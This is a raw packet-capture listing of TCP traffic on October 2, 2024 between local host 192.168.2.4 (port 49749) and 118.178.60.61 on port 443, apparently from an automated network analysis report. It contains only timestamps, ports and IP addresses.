Oct 2, 2024 04:28:42.759555101 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.759561062 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.759588957 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.759604931 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.764661074 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.764734983 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.764736891 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.764749050 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.764775991 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.764787912 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.770190001 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.770239115 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.770247936 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.770253897 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.770287037 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.770302057 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.775789976 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.775844097 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.775851965 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.775882959 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.775917053 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.775926113 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.778915882 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.778965950 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.778970957 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.778976917 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.779016972 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.781363010 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.781423092 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.782547951 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.782603025 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.793325901 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.793373108 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.793411016 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.793422937 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.793448925 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.793471098 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.797538996 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.797599077 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.802480936 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.802553892 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.802573919 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.802584887 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.802618980 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.802618980 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.807848930 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.807905912 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.807939053 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.807950020 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.807976961 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.807995081 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.809871912 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.809931993 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.809935093 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.809946060 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.809988976 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.809988976 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.818877935 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.818933010 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.818969011 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.818979979 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.819013119 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.819015980 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.819063902 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.819067001 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.819067001 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.819080114 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.819109917 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.819132090 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.820502043 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.820548058 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.820575953 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.820586920 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.820611954 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.820631981 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.824315071 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.824409962 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.824445963 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.824506998 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.844361067 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.844407082 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.844439983 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.844451904 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.844479084 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.844532967 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.846276045 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.846319914 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.846335888 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.846347094 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.846370935 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.846390963 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.848419905 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.851512909 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.851609945 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.851624966 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.851686954 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.856827021 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.856889963 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.857013941 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.857079029 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.862763882 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.862812996 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.862838030 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.862843037 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.862857103 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.862890005 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.865664005 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.865778923 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.865817070 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.865822077 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.865863085 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.868007898 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.868062019 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.868065119 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.868077993 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.868110895 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.880167007 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.880229950 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.880234957 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.880240917 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.880275965 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.884100914 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.884159088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.884202957 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.884255886 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.889214039 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.889271975 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.889328957 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.889380932 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.895052910 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.895112991 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.895200014 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.895248890 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.896833897 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.896874905 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.896902084 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.896913052 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.896941900 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.896964073 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.905705929 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.905791044 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.905836105 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.905889034 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.905993938 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.906050920 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.906106949 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.906162024 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.907267094 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.907316923 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.907335043 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.907413006 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.911211014 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.911268950 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.911309958 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.911360025 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.913332939 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.931544065 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.931615114 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.931619883 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.931637049 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.931689978 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.933564901 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.933610916 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.933635950 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.933689117 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.938875914 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.938954115 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.939063072 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.939076900 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.939136982 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.943762064 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.943840027 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.943867922 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.943919897 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.949527025 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.949588060 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.949671030 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.949718952 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.952639103 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.952702045 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.952764988 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.952817917 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.954998970 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.955054045 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.955105066 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.955161095 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.967426062 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.967485905 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.967552900 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.967612028 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.971157074 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.971210003 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.971224070 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.971230030 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.971256971 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.971266985 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.976274014 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.976327896 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.976340055 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.976345062 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.976375103 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.976393938 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.982048035 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.982099056 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.982103109 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.982121944 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.982153893 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.982163906 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.983628988 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.983669043 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.983683109 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.983728886 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.992742062 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.992806911 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.992819071 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.992830038 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.992852926 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.992878914 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.992973089 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.993020058 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.993035078 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.993086100 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.994200945 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.994240999 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.994242907 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.994256020 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.994286060 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.994297028 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.998120070 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.998163939 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.998178005 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.998183012 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:42.998213053 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:42.998213053 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.015197039 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.018877983 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.018920898 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.018954039 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.018959999 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.018973112 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.019000053 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.020524025 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.020565033 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.020576954 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.020581961 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.020617962 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.023576975 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.025825977 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.025887966 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.025890112 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.025902987 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.025928974 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.025947094 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.031088114 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.031136036 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.031145096 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.031152964 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.031179905 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.031197071 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.036379099 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.036442995 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.036448956 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.036465883 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.036489964 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.036511898 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.039925098 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.039989948 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.039995909 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.040010929 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.040041924 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.040051937 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.042193890 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.042241096 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.042256117 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.042309046 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.054292917 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.054356098 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.054366112 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.054375887 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.054404974 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.054416895 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.057940960 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.058000088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.058012962 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.058062077 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.063112974 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.063167095 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.063172102 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.063188076 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.063220024 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.063230038 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.068809986 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.068870068 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.068906069 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.068954945 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.070537090 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.070586920 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.070631027 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.070682049 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.079950094 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.079998970 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080003977 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.080022097 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.080043077 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080065966 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080066919 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.080082893 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.080111980 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080128908 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.080140114 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080144882 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.080172062 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080193043 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.080996990 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.081047058 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.081074953 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.081119061 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.084954023 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.085001945 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.085009098 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.085024118 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.085052013 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.085062027 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.105587006 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.105629921 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.105683088 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.105701923 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.105734110 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.105746031 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.107435942 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.107481003 CEST	443	49749	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:43.107491016 CEST	49749	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:43.107496977 CEST	443	49749	118.178.60.61	192.168.2.4
